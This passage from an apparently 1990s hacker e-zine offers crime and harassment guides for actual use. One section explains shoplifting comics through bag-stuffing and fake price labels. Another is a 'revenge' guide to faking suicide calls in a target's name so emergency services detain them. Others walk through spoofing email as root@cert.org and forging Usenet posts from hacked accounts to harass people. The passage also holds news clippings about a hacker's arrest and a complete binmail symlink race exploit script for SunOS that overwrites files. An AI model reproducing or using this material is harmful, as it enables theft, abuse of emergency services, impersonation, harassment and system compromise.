from because you can get older/more valuable/more rare comic books than
at a bookstore or something.
Choosing the store is very important. You want to find a store
that is poorly run, somewhat spacious, and does not have any employees
walking around watching you. At most of the larger comic book stores,
they'll have a television with some sort of sci-fi movie playing, if
you've seen the movie before, you're in luck. The employees are usually
watching the movie. Listen to the employees talking to see if there is
a part of the movie that they especially want to see. If that part isn't
too far away, you'll want to make your purchase RIGHT before it comes on.
It also works to your advantage if the employees are having a discussion
If you are a veteran collector, and there is a particular store
you hate, because of the owner being an asshole, Whatever, you'll probably
want to hit this store.
Once you have found the comics you want, you can try a few different
things. If you didn't already know, in comic book stores, all back issues
are stored in a plastic comic-sized bag with a thin piece of cardboard o
the back (but inside the bag) to keep the comic book safe. One thing
you can do is get some newer issues off the new issue rack-section-type-
thing, then open up the comic bag, look through the comic book a little
(as if you are deciding whether or not to purchase it) then, as you
are putting the comic away, put a new issue or two inside the bag also.
Remember to put these behind the back issue that was originally in the bag.
Then look around a little longer, then casually go and buy your comic
books.
Another thing to try is somewhat easier, but requires more
planning, and only works if you have some experience collecting.
First of all, you'll need to find a comic book worth stealing.
You don't HAVE to for this plan to work, it may even work better if
its any old comic, but its just not worth it unless you find a comic
worth stealing. I suggest a comic in the $20-$60 price range. Also,
and this is the important part, make sure that it is either not very
popular AT ALL, or that it has 2nd, 3d, etc printings that look exactly
the same as the first printing. Next, go to the comic book store and
find that comic book and check to see if they have 2nd or 3rd, etc,
printings that are cheaper than the first printing. Remember how the
price label looks (you may even want to take a piece of paper and copy
it right there - say you're checking how much comic books are in a couple
of places to compare prices or something), now go home and make that label
again. The next day, go to the store and put that copy of the label
that was on the later printings on the FIRST printing (right over its
old label). Now the first printing looks like a later printing, and
has the same price as a later printing. Now, just like before, wait til
the employees are preoccupied, then make your purchase. You may want to
buy some other comics at the same time so they don't get suspicious.
For those of you who collect comics: a perfect comic to do this with
is the Vampire Lestat #1.
Conventions can be handled somewhat the same way as stores, but
there are usually more people watching you at all times at a convention,
so it can be much harder. An essential at a convention is a bookbag and/or
a binder. The best thing to do at a convention is to look at the boxes
that the dealers have set up under the table; the larger dealers usually
keep the stuff they couldn't fit on their table under the table. While
under the table, keep your bag right next to you, OPEN. Take out some
comics that you'd like out of the box along with some others, proceed
to look at some, then put some down next to the opening of your bag,
and when no one is looking casually, but quickly, slip them into your bag.
But using methods like those above work too, especially putting
comics in a bag with other comics and buying just one (with the others
in the bag). You can find conventions by looking in comic book price
guides or magazines(Wizard, Comics Vaules Monthly, Comic Books Buyers
Guide, etc), in a section entitled 'Conventions!'' or something
self-explanatory like that.
===-
There are more methods than I've described above, but some were
little complicated, some too simple, some just variations on stuff above
and some i just didn't feel like putting in. Again, if you don't collect,
I suggest starting a little before trying any of this, just so you have the
general feel of being at a store and/or a convention; and also cuz its fun.
For those of you who do collect, be careful and not too greedy. If
you have any other ways to get comics, problems with what I wrote,
questions, etc, please leave me mail or talk to me on IRC or something
like that. Cya l8r....
kid Eternity - eternity@phantom.com
...
================================[MiNDCRiME]================================
[FiLE #9:]
Getting Even
The Sequel Your Momma Warned You About.
by h0wcum
Revenge is an art. Cristian belief is to forgive one another, but
my persoanl belive is to make the fuxers pay for even the smallest
mistake. The mistake being fuxing with you. Life is short, unfair and
painfull and I don't have time to waste getting fucked with. So, to make
life a little more interesting, I sit around conceiving and implementing
revenge tactics. Your anger must fuel you. It it the primary driving
force in seeking revenge. The anger must come from severe intolerance of
getting fucked with.
I will discuss a few more revenge tactics in this edition. I'd
like to point out that some are illegal, and some are not. Wether or not
they are illegal, the do not make a good story to tell a cop, so watch
your ass and don't get busted. I will not be resposible for your
implementation or failure to implement these tactics.
Most of these tactics I will discuss require knowing your mark's
name and possibly his or her address.
"They're Coming to Take Me Away!"
This tactic definately requires knowing your mark's name and
address, or atleast his name. The first time I pulled this one off, I did
it from half way across the country. It's great for laughs and it will
really ruin your mark's day.
Find the name of a radio station local to your mark. This isn't
really hard. Find someone in the area to tell you or get it out of
directory assistance, or you can order a set of yellow pages for your
mark's area. (always a good idea as it comes in handy. I have about 10
foreign phone books.). Call that radio station at night, but when you
expect your mark to be awake. You will pretend to be your mark. Act
really upset and paranoid and threaten suicide. BE CONVINCING! Talk of
how the world is against you and you have a gun pointed to your head, or
better yet, say you popped a huge ammount of pills and time is running
out on you. Use your imagination.
If you are certain your mark is not listed in the phone book,
reluctantly give him your address (yes, he will ask repeatedly). Atleast
give him your name. He will call an ambulance on the other line while you
talk. It is especially usefull to use the pill method here because if the
EMT's think you are dying, they will be more forcefull in hauling your
mark away.
If all goes well, the EMT's will be hauling your mark away to the
local mental hospital for a 24 hour stay of observation. This is required
by law in some areas. Of course your mark is going to deny it, but the
doctors will expect that, and it will keep him in longer if he does in
fact get taken. The worst case scenario here is that the ambulance shows
up, and leaves without him. Even if that happens, you can rest assured he
will not be very happy.
Suicide threats to radio stations are taken very seriously, so it
is probable the EMT's will aguire your mark no matter how much he denies
being suicidal. When I tried this, mr. mark was away for 2 days. (I sent
him flowers)
A variation of this tactic would be to call the ambulance and
skip the radio station. You can make up any medical situation, or you can
be suicidal to them. If you do, act really out of it, keep forgetting
things and being contradictory. Make them think you can't remeber from
one minute to the next. That way, they won't believe your mark when he
claims not to be suicidal. neighbors get a kick out of watching ambulances.
PART B: Supplimental Toolz: Fake mail and fake news.
Now before you kiddies get going on this, I know this is old shit.
I know it's been done before and I am merely posting it for the less
informed, so spank me.
Just about every system on the net has a mail daemon running, the
process which handles incoming and out going mail. You can usually connect
to these daemons (on just about any system) by telnetting to port 25 of
that system. Ex:
telnet buttfuck.com 25
I'll show you a sample session. Lines beginning with <you> are
what you would type (duh).
220 gold.tc.umn.edu (Mail*Hub TurboSendmail) Service ready
<you> helo root@cert.org
250 gold.tc.umn.edu G'day MATH1.CIMS.NYU.EDU! Why do you call yourself
root@cert.org? <don't werk like it used too>
<you> mail from: root@cert.org
250 root@cert.org... Sender ok
<you> rcpt to: h0wcum@cyberspace.net
250 h0wcum@cyberspace.net... Recipient ok
<you> data
354 Enter mail, end with "." on a line by itself
<you> To: h0wcum@cyberspace.net
<you> Subject: repeated breakin attempts.
<you> This is an automatic warning generated by a security daemon.
<you> Warning is hereby given to you that unless you cease from your
<you> unlawful activities on the network, criminal charges will be
<you> sought against you.
<you> This is your final warning. The FBI has been notified of
<you> your activities.
<you> You need not reply to this, but should you have any questions,
<you> you may call us directly with this reference number: Q3-23-A.
<you> Have a nice day. BITCH!
<you> .
250 Message received and queued
<you> quit
221 Until later buttfuck.com
Now this isn't totaly untraceable. If any of you know of an
untracable STMP site, please let me know. The recipient will get the
following (shown with full headers, your mail viewer may not show them all
but they are there, just the same).
From root@cert.org Mon Dec 12 02:22:26 1994
Return-Path: <root@cert.org>
Received: from my.fake.mail.com victim.com (4.1/SMI-4.1)
id AA22748; Mon, 12 Dec 94 02:21:23 PST
Received: from buttfuck.com by my.fake.mail.edu; Mon, 12 Dec 94 04:18:54 -0500
To: j00@victim.com
Subject: repeated breakin attempts.
Message-Id: <2eec2399487d002@my.fake.mail.edu>
Date: Mon, 12 Dec 94 04:19:05 -0500
From: root@cert.org
Status: RO
X-Status:
This is an automatic warning generated by a security daemon.
Warning is hereby given to you that unless you cease from your
unlawful activities on the network, criminal charges will be
sought against you.
This is your final warning. The FBI has been notified of
your activities.
You need not reply to this, but should you have any questions,
you may call us directly with this reference number: Q3-23-A.
Have a nice day. BITCH!
---------------------
I embellished a little. my.fake.mail.edu is the mail server you
used, victim.com is your mark's address and buttfuck.com is you. Still,
unless someone points out a better way, there is no way to get rid of this:
Received: from buttfuck.com by my.fake.mail.edu; Mon, 12 Dec 94 04:18:54 -0500
So, if you can, telnet to somewhere else before telnetting you your fake mail
server.
FAKE NEWS
Fake news rox. I allways post fake news to the gay areas of usenet.
You can either post to gay areas, post to alt.test to get your mark about
1000 automatic replies, or cross post wildly to groups that have nothing
to do with what you are posting about so that every Mr. Butt-cheese will
write your mark (and his postmaster which could get him kicked if
enough complaints come in) bitching of an inapropriate cross-post.
You can't telnet to just any NNTP server and post. You can usually
only do it from a host in the NNTP's domain. So use a hacked account for
this. Some sites use a seperate news server in their domain for news. If
you can't find the site, type tin -r and watch for "Connecting to
news.masterbation.com" (or whatever) to find the host then telnet to that
site. You will be using port 119, folks, and if any1 knows an anonymous
access NNTP server, lemmie know. Here's an example:
200 bondage.buttfuck.com InterNetNews NNRP server INN 1.4 20-Mar-93 ready
(posting ok).
<you> group alt.homosexual
211 171 32393 32563 alt.homosexual
<you> post
340 Ok
<you> Newsgroups: alt.homosexual <--- separate by commas. 1 must match
<you> From: solctice@iia.org ^your "group" command
<you> Organization: Idiots Is Awesom <-- anything here
<you> Distributions: world <-- a must
<you> Subject: GWM in need of companion.
<you> <blank line>
<you> Hello all! I'm looking for a nice single gentleman in the NJ
<you> area to get together with. I'm sorta lonely so if you'd like to meet
<you> email me!
<you> -Jim
<you> <blank line> (not really necessary)
<you> .
240 Article posted
quit
205 Connection closed by foreign host.
The message will show up on usenet within about 20 mins. Here's
what it will look like:
From bondage.buttfuck.com!news Mon Dec 12 05:03:45 1994
Path: bondage.buttfuck.com!news <may be more>
From: solctice@iia.org
Newsgroups: alt.homosexual
Subject: GWM in need of companion.
Date: 12 Dec 1994 09:59:03 GMT
Organization: Idiots Is Awesom
Lines: 5
Message-ID: <3ch6t7$2kn@bondage.buttfuck.com>
NNTP-Posting-Host: sodomy.buttfuck.com <--unavoidable unless
you post from the site of your mark.
Distribution: world
Hello all! I'm looking for a nice single gentleman in the NJ
area to get together with. I'm sorta lonely so if you'd like to meet
email me!
-Jim
bondage is the NNTP server and sodomy is the host you posted from
so be sure to use a hacked acct. Like I said most of this is common
knowlege to all hackers. The trick here is most effective use out of it.
Use your imagination. People get really pissed on UseNet. Time Magazine
recently wrote an article on UseNet and how people who cross post get
thousands of nasty replies. One good use of this is to incorporate the
"Make Money Fast" scam into this and cross-post to every group from your
mark. Time said a lot off ppl got pissed, a lot. So do it up. Remeber, if
you're gonna get revenge, don't do it with sticks and stones, do it nuclear.
-h0wcum
JUST IN: (old news, but I just found it) These are NNTP servers
which you can telnet to from anywhere:
This list was compiled by Matthew Ghio (ghio@myriad.pc.cc.cmu.edu).
[Edited by me to remove no posting and non workable sites]
ccvax.ucd.ie
myriad.pc.cc.cmu.edu
news.c2.org
news.cis.nctu.edu.tw
news.csie.nctu.edu.tw
news.usafa.af.mil [u try it, not me :) ]
================================[MiNDCRiME]================================
[File #10:]
[Courtesy of Rerror]
These are two articles about John Falcon's arrest that appeared
in the Anchorage Daily News in Alaska:
Police Report
Hacker accused of computer fraud
A 20-year-old Anchorage man has been charged with four counts
related to computer fraud. Donald Max Fanning is accused of
breaking into a computer system at a Seattle-based company and
illegally charging phone calls to the Federal Aviation
Administration and MarkAir. The charges also allege that
Fanning stole property from Elmendorf Air Force Base and
illegally obtained a password that could have allowed him to
break into a government computer. Fanning is scheduled to be
arraigned in U.S. District Court today.
Daily News staff report
Hacker gets 20-month sentence
By S.J. Komarnitsky
Daily News Reporter
An Anchorage man convicted of computer hacking has
been sentenced to 20 months in federal prison.
Donald Max Fanning was also ordered to pay $21,000 in
restitution and perform 200 hours of community service.
Fanning, 20, pleaded guilty in June to two counts of
computer fraud, one count of fradulant use of an access
device, and theft of U.S. government property.
Assistant U.S. Attorney Jim Torgerson said the charged
included stealing computer equipment from Elmendorf Air Force
Base, illegally charging more than $1,700 in long-distance
calls to the Federal Aviation Administration and MarkAir, and
breaking into a Seattle-based computer company. (Typist: I
know this to be Tera Computer)
Fanning also posted the code he used to charge calls
to the FAA on a voice-mail system.
Torgerson said Wednesday that most of the money -
about $14,000 - would go to the Air Force to cover the cost of
the stolen equipment. An additional $4,800 would go to the
Seattle company to repay its costs in tracking Fanning down,
while the remainder would be given to the FAA and MArkAir to
pay for the phone calls.
Fanning will be on probation for three years following
his release. As part of his sentence, he will not be allowed
to own or use any computer during that time.
--
You can E-Mail him at jfalcon@ice-bbs.alaska.net ... I will
print out and send anything sent here to him in prison. Responses
will be E-Mailed back.
================================[MiNDCRiME]================================
================================[MiNDCRiME]================================
[ File #11:]
[ I was told this was *thee* absolute latest sendmail script. If I am wrong,
spank me, cuz not only do I not give a flying fuck, but there are so many
sendmail exploits, it makes my head spin and I do not even try to keep
up with all of them. -hC ]
#!/bin/sh
# tmpmail: overwrite files using binmail
#
# Usage: tmpmail to-file
#
# [8lgm], tested under SunOS 4.1.2.
#
# Definitely NOT for distribution, please do not use for cracking purposes!
# This script is only to be provided to trusted users, due to poor
# workaround chances.
#
# Note: Script only works if mail is suid root.
# Other vendors may use tmpnam("ma").
#
# This vulnerability can be exploited for sgid
# mail binmails, the only modification would
# be to predict the pid of the mail process
# created by sendmail. This would be 4 forward
# of the current pid - assuming a 'quiet' system.
#
# Will create to-file, or truncate.
PATH=/usr/ucb:/usr/bin:/bin export PATH
IFS=" " export IFS
PROG="`basename $0`"
# Check args
if [ $# -ne 1 ]; then
echo "Syntax: $PROG to-file"
exit 1
fi
TO_FILE="$1"
# Create our racing program!
cat > mailrace.c << 'EOF'
#include <stdio.h>
#include <unistd.h>
char path[] = "/tmp/maaXXXX";
main(argc,argv)
int argc;
char **argv;
{
int pid;
char *trv;
if (argc != 3) {
fprintf(stderr, "Usage: %s pid tofile\n", argv[0]);
exit(1);
}
pid = atoi(argv[1]);
/* Stolen from mktemp.c */
for (trv = path; *trv; ++trv); /* extra X's get set to 0's */
while (*--trv == 'X') {
*trv = (pid % 10) + '0';
pid /= 10;
}
symlink("/tmp/ShortSong", path);
while(symlink(argv[2], path));
unlink("/tmp/ShortSong");
exit(0);
}
EOF
cc -o mailrace mailrace.c
# Check we now have mailrace
if [ ! -x "mailrace" ]; then
echo "$PROG: couldnt compile mailrace.c - check it out"
exit 1
fi
# create some input for binmail
echo localhost $USER > /tmp/BlueRoom.$$
./mailrace $$ $TO_FILE &
exec /bin/mail -d $LOGNAME < /tmp/BlueRoom.$$
================================[MiNDCRiME]================================
